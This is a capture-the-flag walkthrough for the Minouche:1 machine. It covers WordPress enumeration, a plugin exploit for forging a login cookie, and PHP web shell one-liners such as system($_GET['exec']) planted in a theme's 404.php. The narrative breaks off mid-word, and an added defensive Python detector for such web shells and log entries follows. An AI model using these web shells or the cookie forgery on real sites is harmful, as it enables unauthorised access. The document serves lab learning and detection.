Minouche : 1
Updated: Apr 25, 2020
In this article we are going to solve another boot2root challenge, Minouche:1. This is a very interesting machine and we are going to learn many new things throughout this article.
IP of the target: 192.168.43.193
The first step is to find the open ports and the services running on the target using the command: sudo nmap -A 192.168.43.193
Okay, we have only two ports open. We decided to enumerate the HTTP service as usual.
We found a WordPress website and decided to enumerate it further using wpscan. Command used: sudo wpscan --url http://192.168.43.193 --enumerate u,vp,vt
As with other WordPress CTF challenges, we tried a brute-force attack to find the password, but we failed to find it.
Next we run the dirb tool to find more directories, in case any of them holds useful information.
Command used: sudo dirb http://192.168.43.193
These two directories look useful, but /wp-admin/ requires a username and password, and /noindex/ is the default Apache HTTP Server home page.
It seemed like a dead end until we found this link on the internet. As described in the link, we run wpscan again with the command:
wpscan --url http://192.168.43.193 --wp-content-dir /wp-content/ --enumerate p --plugins-detection aggressive
We have an outdated plugin version, so we searched the internet for an exploit for this plugin. Luckily a Python script is available on Exploit-DB. We downloaded the script to our local system; now let's run it.
We need to pass these arguments to the script and run it again: python exp.py -n kitty -u http://192.168.43.193
As we can see in the output, we need to use these cookies to log in successfully as user kitty; then we can upload our shell and obtain a reverse shell (looks very simple).
We browse to /wp-admin/ and intercept the request with Burp Suite to modify the cookie.
Now let's modify the cookie.
Forward this request and we can see that we are now logged in as user kitty.
NOTE: if you are unable to log in using this method, use msfconsole; a very simple exploit is available there which directly gives you a shell as the apache user.
Okay, now, as in other CTF challenges, we decided to edit the theme's 404.php file and replace it with PHP reverse shell code, but when we execute the PHP file we don't get the reverse shell. So with the help of a simple PHP script we decided to walk through the different system directories.
<?php echo "<pre>"; echo shell_exec('whoami'); /* the command must be a quoted string; a bare whoami is an undefined constant */ ?>
First of all we run a very simple command to check that everything is working.
This command works fine, but when we try a few more commands we find that we can't see the contents of the /home directory, we can't run any Python script because Python is not installed on the system, and we can't use nc to get a reverse shell either. We then try to list the root directory "/" with the same script, but that fails too. So we change our PHP script to:
<?php echo "<pre>"; echo system($_GET['exec']); ?>
Now we execute this script again with the GET parameter ?exec=ls /, and yes, this time we can see the contents and found a very interest
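The two modified-template scripts above are exactly what a defender would look for on a WordPress host. The following Python is an added detection example, not part of the original writeup: it flags theme files that pass request input straight to a shell function and pulls direct requests to theme templates carrying a query string out of Apache access logs. The theme name demo, the file contents and the log lines are constructed for the demo.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import parse_qs, urlsplit

# PHP functions that hand a string to the OS shell, fed straight from
# request data, e.g. system($_GET['exec']) as in the edited 404.php above.
WEBSHELL_RE = re.compile(
    r"\b(?:system|shell_exec|exec|passthru|popen|proc_open)\s*\(\s*"
    r"\$_(?:GET|POST|REQUEST|COOKIE)\b", re.IGNORECASE)

# Request path and status from an Apache combined-format access log entry.
LOG_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def scan_php(source: str) -> List[int]:
    """1-based line numbers where request input reaches a shell function."""
    return [n for n, line in enumerate(source.splitlines(), 1)
            if WEBSHELL_RE.search(line)]


def suspicious_requests(log_lines: List[str]) -> List[Tuple[str, Dict[str, str]]]:
    """(template path, decoded query) for direct hits on theme PHP files.
    Themes are normally reached through index.php, so a template requested
    directly with parameters deserves a look."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("path"))
        if "/wp-content/themes/" in parts.path and parts.path.endswith(".php") and parts.query:
            hits.append((parts.path, {k: v[0] for k, v in parse_qs(parts.query).items()}))
    return hits


# Constructed sample: a theme 404.php with the one-liner shell appended.
SAMPLE_404 = (
    "<?php\n"
    "get_header();\n"
    "?><h1>Page not found</h1><?php\n"
    "echo \"<pre>\"; echo system($_GET['exec']); ?>\n"
)

# Constructed sample access-log lines (combined format).
SAMPLE_LOG = [
    '10.0.0.5 - - [25/Apr/2020:10:01:02 +0000] "GET /wp-content/themes/demo/404.php?exec=ls%20/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [25/Apr/2020:10:01:09 +0000] "GET /index.php HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [25/Apr/2020:10:02:00 +0000] "GET /wp-content/themes/demo/style.css?ver=1.0 HTTP/1.1" 200 4000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print("web shell lines:", scan_php(SAMPLE_404))
    print("suspicious requests:", suspicious_requests(SAMPLE_LOG))
```

Run scan_php over wp-content/themes on a real install and compare the flagged files against a clean copy of the theme; a legitimate 404.php never calls system() on request data.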